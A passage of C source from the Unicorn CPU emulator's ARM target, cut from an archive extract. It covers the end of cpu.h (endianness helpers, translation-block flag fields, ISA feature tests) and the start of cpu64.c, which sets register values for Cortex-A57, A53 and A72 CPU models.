// !arm_feature(env, ARM_FEATURE_V7) && (env->cp15.sctlr_el[1] & SCTLR_B) != 0; } uint64_t arm_sctlr(CPUARMState *env, int el); static inline bool arm_cpu_data_is_big_endian_a32(CPUARMState *env, bool sctlr_b) { /* In 32bit endianness is determined by looking at CPSR's E bit */ return env->uncached_cpsr & CPSR_E; } static inline bool arm_cpu_data_is_big_endian_a64(int el, uint64_t sctlr) { return sctlr & (el ? SCTLR_EE : SCTLR_E0E); } /* Return true if the processor is in big-endian mode. */ static inline bool arm_cpu_data_is_big_endian(CPUARMState *env) { if (!is_a64(env)) { return arm_cpu_data_is_big_endian_a32(env, arm_sctlr_b(env)); } else { int cur_el = arm_current_el(env); uint64_t sctlr = arm_sctlr(env, cur_el); return arm_cpu_data_is_big_endian_a64(cur_el, sctlr); } } typedef CPUARMState CPUArchState; typedef ARMCPU ArchCPU; #include "exec/cpu-all.h" /* * Bit usage in the TB flags field: bit 31 indicates whether we are * in 32 or 64 bit mode. The meaning of the other bits depends on that. * We put flags which are shared between 32 and 64 bit mode at the top * of the word, and flags which apply to only one mode at the bottom. * * 31 20 18 14 9 0 * +--------------+-----+-----+----------+--------------+ * | | | TBFLAG_A32 | | * | | +-----+----------+ TBFLAG_AM32 | * | TBFLAG_ANY | |TBFLAG_M32| | * | | +-+----------+--------------| * | | | TBFLAG_A64 | * +--------------+---------+---------------------------+ * 31 20 15 0 * * Unless otherwise noted, these bits are cached in env->hflags. */ FIELD(TBFLAG_ANY, AARCH64_STATE, 31, 1) FIELD(TBFLAG_ANY, SS_ACTIVE, 30, 1) FIELD(TBFLAG_ANY, PSTATE_SS, 29, 1) /* Not cached. */ FIELD(TBFLAG_ANY, BE_DATA, 28, 1) FIELD(TBFLAG_ANY, MMUIDX, 24, 4) /* Target EL if we take a floating-point-disabled exception */ FIELD(TBFLAG_ANY, FPEXC_EL, 22, 2) /* For A-profile only, target EL for debug exceptions. */ FIELD(TBFLAG_ANY, DEBUG_TARGET_EL, 20, 2) /* * Bit usage when in AArch32 state, both A- and M-profile. */ FIELD(TBFLAG_AM32, CONDEXEC, 0, 8) /* Not cached. */ FIELD(TBFLAG_AM32, THUMB, 8, 1) /* Not cached. */ /* * Bit usage when in AArch32 state, for A-profile only. */ FIELD(TBFLAG_A32, VECLEN, 9, 3) /* Not cached. 
*/ FIELD(TBFLAG_A32, VECSTRIDE, 12, 2) /* Not cached. */ /* * We store the bottom two bits of the CPAR as TB flags and handle * checks on the other bits at runtime. This shares the same bits as * VECSTRIDE, which is OK as no XScale CPU has VFP. * Not cached, because VECLEN+VECSTRIDE are not cached. */ FIELD(TBFLAG_A32, XSCALE_CPAR, 12, 2) FIELD(TBFLAG_A32, VFPEN, 14, 1) /* Partially cached, minus FPEXC. */ FIELD(TBFLAG_A32, SCTLR_B, 15, 1) FIELD(TBFLAG_A32, HSTR_ACTIVE, 16, 1) /* * Indicates whether cp register reads and writes by guest code should access * the secure or nonsecure bank of banked registers; note that this is not * the same thing as the current security state of the processor! */ FIELD(TBFLAG_A32, NS, 17, 1) /* * Bit usage when in AArch32 state, for M-profile only. */ /* Handler (ie not Thread) mode */ FIELD(TBFLAG_M32, HANDLER, 9, 1) /* Whether we should generate stack-limit checks */ FIELD(TBFLAG_M32, STACKCHECK, 10, 1) /* Set if FPCCR.LSPACT is set */ FIELD(TBFLAG_M32, LSPACT, 11, 1) /* Not cached. */ /* Set if we must create a new FP context */ FIELD(TBFLAG_M32, NEW_FP_CTXT_NEEDED, 12, 1) /* Not cached. */ /* Set if FPCCR.S does not match current security state */ FIELD(TBFLAG_M32, FPCCR_S_WRONG, 13, 1) /* Not cached. */ /* * Bit usage when in AArch64 state */ FIELD(TBFLAG_A64, TBII, 0, 2) FIELD(TBFLAG_A64, SVEEXC_EL, 2, 2) FIELD(TBFLAG_A64, ZCR_LEN, 4, 4) FIELD(TBFLAG_A64, PAUTH_ACTIVE, 8, 1) FIELD(TBFLAG_A64, BT, 9, 1) FIELD(TBFLAG_A64, BTYPE, 10, 2) /* Not cached. */ FIELD(TBFLAG_A64, TBID, 12, 2) FIELD(TBFLAG_A64, UNPRIV, 14, 1) /** * cpu_mmu_index: * @env: The cpu environment * @ifetch: True for code access, false for data access. * * Return the core mmu index for the current translation regime. * This function is used by generic TCG code paths. */ static inline int cpu_mmu_index(CPUARMState *env, bool ifetch) { return FIELD_EX32(env->hflags, TBFLAG_ANY, MMUIDX); } static inline bool bswap_code(bool sctlr_b) { /* All code access in ARM is little endian, and there are no loaders * doing swaps that need to be reversed */ // return 0; // Unicorn: Our hack to support BE32 for system emulation, which // I believe shouldn't have existed... return sctlr_b; } void cpu_get_tb_cpu_state(CPUARMState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags); enum { QEMU_PSCI_CONDUIT_DISABLED = 0, QEMU_PSCI_CONDUIT_SMC = 1, QEMU_PSCI_CONDUIT_HVC = 2, }; /* Return the address space index to use for a memory access */ static inline int arm_asidx_from_attrs(CPUState *cs, MemTxAttrs attrs) { return attrs.secure ? ARMASIdx_S : ARMASIdx_NS; } /* Return the AddressSpace to use for a memory access * (which depends on whether the access is S or NS, and whether * the board gave us a separate AddressSpace for S accesses). */ static inline AddressSpace *arm_addressspace(CPUState *cs, MemTxAttrs attrs) { return cpu_get_address_space(cs, arm_asidx_from_attrs(cs, attrs)); } /** * arm_rebuild_hflags: * Rebuild the cached TBFLAGS for arbitrary changed processor state. */ void arm_rebuild_hflags(CPUARMState *env); /** * aa32_vfp_dreg: * Return a pointer to the Dn register within env in 32-bit mode. */ static inline uint64_t *aa32_vfp_dreg(CPUARMState *env, unsigned regno) { return &env->vfp.zregs[regno >> 1].d[regno & 1]; } /** * aa32_vfp_qreg: * Return a pointer to the Qn register within env in 32-bit mode. 
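 * (Q registers alias pairs of D registers: Qn covers D(2n) and D(2n+1).
 * In the zregs[] layout used here those are the two 64-bit lanes of
 * zregs[n], which is why aa32_vfp_dreg above indexes with regno >> 1
 * and regno & 1.)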
*/ static inline uint64_t *aa32_vfp_qreg(CPUARMState *env, unsigned regno) { return &env->vfp.zregs[regno].d[0]; } /** * aa64_vfp_qreg: * Return a pointer to the Qn register within env in 64-bit mode. */ static inline uint64_t *aa64_vfp_qreg(CPUARMState *env, unsigned regno) { return &env->vfp.zregs[regno].d[0]; } /* Shared between translate-sve.c and sve_helper.c. */ extern const uint64_t pred_esz_masks[4]; /* * Naming convention for isar_feature functions: * Functions which test 32-bit ID registers should have _aa32_ in * their name. Functions which test 64-bit ID registers should have * _aa64_ in their name. These must only be used in code where we * know for certain that the CPU has AArch32 or AArch64 respectively * or where the correct answer for a CPU which doesn't implement that * CPU state is "false" (eg when generating A32 or A64 code, if adding * system registers that are specific to that CPU state, for "should * we let this system register bit be set" tests where the 32-bit * flavour of the register doesn't have the bit, and so on). * Functions which simply ask "does this feature exist at all" have * _any_ in their name, and always return the logical OR of the _aa64_ * and the _aa32_ function. */ /* * 32-bit feature tests via id registers. */ static inline bool isar_feature_aa32_thumb_div(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar0, ID_ISAR0, DIVIDE) != 0; } static inline bool isar_feature_aa32_arm_div(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar0, ID_ISAR0, DIVIDE) > 1; } static inline bool isar_feature_aa32_jazelle(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar1, ID_ISAR1, JAZELLE) != 0; } static inline bool isar_feature_aa32_aes(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, AES) != 0; } static inline bool isar_feature_aa32_pmull(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, AES) > 1; } static inline bool isar_feature_aa32_sha1(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, SHA1) != 0; } static inline bool isar_feature_aa32_sha2(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, SHA2) != 0; } static inline bool isar_feature_aa32_crc32(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, CRC32) != 0; } static inline bool isar_feature_aa32_rdm(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, RDM) != 0; } static inline bool isar_feature_aa32_vcma(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar5, ID_ISAR5, VCMA) != 0; } static inline bool isar_feature_aa32_jscvt(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, JSCVT) != 0; } static inline bool isar_feature_aa32_dp(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, DP) != 0; } static inline bool isar_feature_aa32_fhm(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, FHM) != 0; } static inline bool isar_feature_aa32_sb(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, SB) != 0; } static inline bool isar_feature_aa32_predinv(const ARMISARegisters *id) { return FIELD_EX32(id->id_isar6, ID_ISAR6, SPECRES) != 0; } static inline bool isar_feature_aa32_fp16_arith(const ARMISARegisters *id) { /* * This is a placeholder for use by VCMA until the rest of * the ARMv8.2-FP16 extension is implemented for aa32 mode. * At which point we can properly set and check MVFR1.FPHP. 
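 * (In the ID_AA64PFR0.FP field, 0b0000 means FP only, 0b0001 means FP
 * plus half-precision support, and 0b1111 means no FP at all -- so the
 * == 1 test below is specifically "FP16 arithmetic present".)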
*/ return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, FP) == 1; } static inline bool isar_feature_aa32_vfp_simd(const ARMISARegisters *id) { /* * Return true if either VFP or SIMD is implemented. * In this case, a minimum of VFP w/ D0-D15. */ return FIELD_EX32(id->mvfr0, MVFR0, SIMDREG) > 0; } static inline bool isar_feature_aa32_simd_r32(const ARMISARegisters *id) { /* Return true if D16-D31 are implemented */ return FIELD_EX32(id->mvfr0, MVFR0, SIMDREG) >= 2; } static inline bool isar_feature_aa32_fpshvec(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr0, MVFR0, FPSHVEC) > 0; } static inline bool isar_feature_aa32_fpsp_v2(const ARMISARegisters *id) { /* Return true if CPU supports single precision floating point, VFPv2 */ return FIELD_EX32(id->mvfr0, MVFR0, FPSP) > 0; } static inline bool isar_feature_aa32_fpsp_v3(const ARMISARegisters *id) { /* Return true if CPU supports single precision floating point, VFPv3 */ return FIELD_EX32(id->mvfr0, MVFR0, FPSP) >= 2; } static inline bool isar_feature_aa32_fpdp_v2(const ARMISARegisters *id) { /* Return true if CPU supports double precision floating point, VFPv2 */ return FIELD_EX32(id->mvfr0, MVFR0, FPDP) > 0; } static inline bool isar_feature_aa32_fpdp_v3(const ARMISARegisters *id) { /* Return true if CPU supports double precision floating point, VFPv3 */ return FIELD_EX32(id->mvfr0, MVFR0, FPDP) >= 2; } static inline bool isar_feature_aa32_vfp(const ARMISARegisters *id) { return isar_feature_aa32_fpsp_v2(id) || isar_feature_aa32_fpdp_v2(id); } /* * We always set the FP and SIMD FP16 fields to indicate identical * levels of support (assuming SIMD is implemented at all), so * we only need one set of accessors. */ static inline bool isar_feature_aa32_fp16_spconv(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr1, MVFR1, FPHP) > 0; } static inline bool isar_feature_aa32_fp16_dpconv(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr1, MVFR1, FPHP) > 1; } /* * Note that this ID register field covers both VFP and Neon FMAC, * so should usually be tested in combination with some other * check that confirms the presence of whichever of VFP or Neon is * relevant, to avoid accidentally enabling a Neon feature on * a VFP-no-Neon core or vice-versa. 
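 * (Sketch of the intended usage, assuming a VFP VFMA decoder: gate it
 * on isar_feature_aa32_simdfmac(id) && isar_feature_aa32_fpsp_v2(id),
 * while the Neon VFMA variant would pair simdfmac with a Neon check
 * instead.)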
*/ static inline bool isar_feature_aa32_simdfmac(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr1, MVFR1, SIMDFMAC) != 0; } static inline bool isar_feature_aa32_vsel(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 1; } static inline bool isar_feature_aa32_vcvt_dr(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 2; } static inline bool isar_feature_aa32_vrint(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 3; } static inline bool isar_feature_aa32_vminmaxnm(const ARMISARegisters *id) { return FIELD_EX32(id->mvfr2, MVFR2, FPMISC) >= 4; } static inline bool isar_feature_aa32_pan(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr3, ID_MMFR3, PAN) != 0; } static inline bool isar_feature_aa32_ats1e1(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr3, ID_MMFR3, PAN) >= 2; } static inline bool isar_feature_aa32_pmu_8_1(const ARMISARegisters *id) { /* 0xf means "non-standard IMPDEF PMU" */ return FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) >= 4 && FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) != 0xf; } static inline bool isar_feature_aa32_pmu_8_4(const ARMISARegisters *id) { /* 0xf means "non-standard IMPDEF PMU" */ return FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) >= 5 && FIELD_EX32(id->id_dfr0, ID_DFR0, PERFMON) != 0xf; } static inline bool isar_feature_aa32_hpd(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr4, ID_MMFR4, HPDS) != 0; } static inline bool isar_feature_aa32_ac2(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr4, ID_MMFR4, AC2) != 0; } static inline bool isar_feature_aa32_ccidx(const ARMISARegisters *id) { return FIELD_EX32(id->id_mmfr4, ID_MMFR4, CCIDX) != 0; } /* * 64-bit feature tests via id registers. */ static inline bool isar_feature_aa64_aes(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, AES) != 0; } static inline bool isar_feature_aa64_pmull(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, AES) > 1; } static inline bool isar_feature_aa64_sha1(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA1) != 0; } static inline bool isar_feature_aa64_sha256(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA2) != 0; } static inline bool isar_feature_aa64_sha512(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA2) > 1; } static inline bool isar_feature_aa64_crc32(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, CRC32) != 0; } static inline bool isar_feature_aa64_atomics(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, ATOMIC) != 0; } static inline bool isar_feature_aa64_rdm(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, RDM) != 0; } static inline bool isar_feature_aa64_sha3(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SHA3) != 0; } static inline bool isar_feature_aa64_sm3(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SM3) != 0; } static inline bool isar_feature_aa64_sm4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, SM4) != 0; } static inline bool isar_feature_aa64_dp(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, DP) != 0; } static inline bool isar_feature_aa64_fhm(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, FHM) != 0; } static inline bool 
isar_feature_aa64_condm_4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, TS) != 0; } static inline bool isar_feature_aa64_condm_5(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, TS) >= 2; } static inline bool isar_feature_aa64_rndr(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar0, ID_AA64ISAR0, RNDR) != 0; } static inline bool isar_feature_aa64_jscvt(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, JSCVT) != 0; } static inline bool isar_feature_aa64_fcma(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, FCMA) != 0; } static inline bool isar_feature_aa64_pauth(const ARMISARegisters *id) { uint64_t apa, api, gpa, gpi; /* * Note that while QEMU will only implement the architected algorithm * QARMA, and thus APA+GPA, the host cpu for kvm may use implementation * defined algorithms, and thus API+GPI, and this predicate controls * migration of the 128-bit keys. */ FIELD_DP64(0, ID_AA64ISAR1, APA, 0xf, apa) FIELD_DP64(0, ID_AA64ISAR1, API, 0xf, api) FIELD_DP64(0, ID_AA64ISAR1, GPA, 0xf, gpa) FIELD_DP64(0, ID_AA64ISAR1, GPI, 0xf, gpi) return (id->id_aa64isar1 & (apa | api | gpa | gpi)) != 0; } static inline bool isar_feature_aa64_sb(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, SB) != 0; } static inline bool isar_feature_aa64_predinv(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, SPECRES) != 0; } static inline bool isar_feature_aa64_frint(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, FRINTTS) != 0; } static inline bool isar_feature_aa64_dcpop(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, DPB) != 0; } static inline bool isar_feature_aa64_dcpodp(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, DPB) >= 2; } static inline bool isar_feature_aa64_fp_simd(const ARMISARegisters *id) { /* We always set the AdvSIMD and FP fields identically. */ return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, FP) != 0xf; } static inline bool isar_feature_aa64_fp16(const ARMISARegisters *id) { /* We always set the AdvSIMD and FP fields identically wrt FP16. 
*/ return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, FP) == 1; } static inline bool isar_feature_aa64_aa32(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, EL0) >= 2; } static inline bool isar_feature_aa64_sve(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64pfr0, ID_AA64PFR0, SVE) != 0; } static inline bool isar_feature_aa64_vh(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, VH) != 0; } static inline bool isar_feature_aa64_lor(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, LO) != 0; } static inline bool isar_feature_aa64_pan(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, PAN) != 0; } static inline bool isar_feature_aa64_ats1e1(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr1, ID_AA64MMFR1, PAN) >= 2; } static inline bool isar_feature_aa64_uao(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr2, ID_AA64MMFR2, UAO) != 0; } static inline bool isar_feature_aa64_bti(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64pfr1, ID_AA64PFR1, BT) != 0; } static inline bool isar_feature_aa64_pmu_8_1(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) >= 4 && FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) != 0xf; } static inline bool isar_feature_aa64_pmu_8_4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) >= 5 && FIELD_EX64(id->id_aa64dfr0, ID_AA64DFR0, PMUVER) != 0xf; } static inline bool isar_feature_aa64_rcpc_8_3(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, LRCPC) != 0; } static inline bool isar_feature_aa64_rcpc_8_4(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64isar1, ID_AA64ISAR1, LRCPC) >= 2; } static inline bool isar_feature_aa64_ccidx(const ARMISARegisters *id) { return FIELD_EX64(id->id_aa64mmfr2, ID_AA64MMFR2, CCIDX) != 0; } /* * Feature tests for "does this exist in either 32-bit or 64-bit?" */ static inline bool isar_feature_any_fp16(const ARMISARegisters *id) { return isar_feature_aa64_fp16(id) || isar_feature_aa32_fp16_arith(id); } static inline bool isar_feature_any_predinv(const ARMISARegisters *id) { return isar_feature_aa64_predinv(id) || isar_feature_aa32_predinv(id); } static inline bool isar_feature_any_pmu_8_1(const ARMISARegisters *id) { return isar_feature_aa64_pmu_8_1(id) || isar_feature_aa32_pmu_8_1(id); } static inline bool isar_feature_any_pmu_8_4(const ARMISARegisters *id) { return isar_feature_aa64_pmu_8_4(id) || isar_feature_aa32_pmu_8_4(id); } static inline bool isar_feature_any_ccidx(const ARMISARegisters *id) { return isar_feature_aa64_ccidx(id) || isar_feature_aa32_ccidx(id); } /* * Forward to the above feature tests given an ARMCPU pointer. 
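 * (e.g. cpu_isar_feature(aa64_sve, cpu) expands to
 * isar_feature_aa64_sve(&cpu->isar).)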
*/ #define cpu_isar_feature(name, cpu) isar_feature_##name(&cpu->isar) #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/cpu64.c���������������������������������������������������������������0000664�0000000�0000000�00000031305�14675241067�0017327�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU AArch64 CPU * * Copyright (c) 2013 Linaro Ltd * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #include "qemu/osdep.h" #include "cpu.h" #include <exec/exec-all.h> void arm_cpu_realizefn(struct uc_struct *uc, CPUState *dev); void arm_cpu_class_init(struct uc_struct *uc, CPUClass *oc); void arm_cpu_post_init(CPUState *obj); void arm_cpu_initfn(struct uc_struct *uc, CPUState *obj); ARMCPU *cpu_arm_init(struct uc_struct *uc); static inline void set_feature(CPUARMState *env, int feature) { env->features |= 1ULL << feature; } static void aarch64_a57_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_AARCH64); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x411fd070; cpu->revidr = 0x00000000; cpu->reset_fpsid = 0x41034070; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x12111111; cpu->isar.mvfr2 = 0x00000043; cpu->ctr = 0x8444c004; cpu->reset_sctlr = 0x00c50838; cpu->id_pfr0 = 0x00000131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x03010066; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10101105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01260000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232042; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x00011142; cpu->isar.id_isar5 = 0x00011121; cpu->isar.id_isar6 = 0; cpu->isar.id_aa64pfr0 = 0x00002222; cpu->isar.id_aa64dfr0 = 0x10305106; cpu->isar.id_aa64isar0 = 0x00011120; cpu->isar.id_aa64mmfr0 = 0x00001124; cpu->isar.dbgdidr = 0x3516d000; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32KB L1 dcache 
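     * (CCSIDR decode: bits[2:0] = 2 -> 64-byte lines, bits[12:3] = 1 ->
     * 2 ways, bits[27:13] = 255 -> 256 sets; 256 * 2 * 64 = 32KB)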
*/ cpu->ccsidr[1] = 0x201fe012; /* 48KB L1 icache */ cpu->ccsidr[2] = 0x70ffe07a; /* 2048KB L2 cache */ cpu->dcz_blocksize = 4; /* 64 bytes */ cpu->gic_num_lrs = 4; cpu->gic_vpribits = 5; cpu->gic_vprebits = 5; } static void aarch64_a53_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_AARCH64); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x410fd034; cpu->revidr = 0x00000000; cpu->reset_fpsid = 0x41034070; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x12111111; cpu->isar.mvfr2 = 0x00000043; cpu->ctr = 0x84448004; /* L1Ip = VIPT */ cpu->reset_sctlr = 0x00c50838; cpu->id_pfr0 = 0x00000131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x03010066; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10101105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01260000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232042; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x00011142; cpu->isar.id_isar5 = 0x00011121; cpu->isar.id_isar6 = 0; cpu->isar.id_aa64pfr0 = 0x00002222; cpu->isar.id_aa64dfr0 = 0x10305106; cpu->isar.id_aa64isar0 = 0x00011120; cpu->isar.id_aa64mmfr0 = 0x00001122; /* 40 bit physical addr */ cpu->isar.dbgdidr = 0x3516d000; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x700fe01a; /* 32KB L1 dcache */ cpu->ccsidr[1] = 0x201fe00a; /* 32KB L1 icache */ cpu->ccsidr[2] = 0x707fe07a; /* 1024KB L2 cache */ cpu->dcz_blocksize = 4; /* 64 bytes */ cpu->gic_num_lrs = 4; cpu->gic_vpribits = 5; cpu->gic_vprebits = 5; } static void aarch64_a72_initfn(struct uc_struct *uc, CPUState *obj) { ARMCPU *cpu = ARM_CPU(obj); set_feature(&cpu->env, ARM_FEATURE_V8); set_feature(&cpu->env, ARM_FEATURE_NEON); set_feature(&cpu->env, ARM_FEATURE_GENERIC_TIMER); set_feature(&cpu->env, ARM_FEATURE_AARCH64); set_feature(&cpu->env, ARM_FEATURE_CBAR_RO); set_feature(&cpu->env, ARM_FEATURE_EL2); set_feature(&cpu->env, ARM_FEATURE_EL3); set_feature(&cpu->env, ARM_FEATURE_PMU); cpu->midr = 0x410fd083; cpu->revidr = 0x00000000; cpu->reset_fpsid = 0x41034080; cpu->isar.mvfr0 = 0x10110222; cpu->isar.mvfr1 = 0x12111111; cpu->isar.mvfr2 = 0x00000043; cpu->ctr = 0x8444c004; cpu->reset_sctlr = 0x00c50838; cpu->id_pfr0 = 0x00000131; cpu->id_pfr1 = 0x00011011; cpu->isar.id_dfr0 = 0x03010066; cpu->id_afr0 = 0x00000000; cpu->isar.id_mmfr0 = 0x10201105; cpu->isar.id_mmfr1 = 0x40000000; cpu->isar.id_mmfr2 = 0x01260000; cpu->isar.id_mmfr3 = 0x02102211; cpu->isar.id_isar0 = 0x02101110; cpu->isar.id_isar1 = 0x13112111; cpu->isar.id_isar2 = 0x21232042; cpu->isar.id_isar3 = 0x01112131; cpu->isar.id_isar4 = 0x00011142; cpu->isar.id_isar5 = 0x00011121; cpu->isar.id_aa64pfr0 = 0x00002222; cpu->isar.id_aa64dfr0 = 0x10305106; cpu->isar.id_aa64isar0 = 0x00011120; cpu->isar.id_aa64mmfr0 = 0x00001124; cpu->isar.dbgdidr = 0x3516d000; cpu->clidr = 0x0a200023; cpu->ccsidr[0] = 0x701fe00a; /* 32KB L1 dcache */ cpu->ccsidr[1] = 0x201fe012; /* 48KB L1 icache */ cpu->ccsidr[2] = 0x707fe07a; /* 1MB L2 cache */ cpu->dcz_blocksize = 4; /* 64 bytes */ cpu->gic_num_lrs = 4; cpu->gic_vpribits = 5; cpu->gic_vprebits = 5; } /* -cpu max: if KVM is enabled, like -cpu host (best possible with this host); * otherwise, a CPU with as many features 
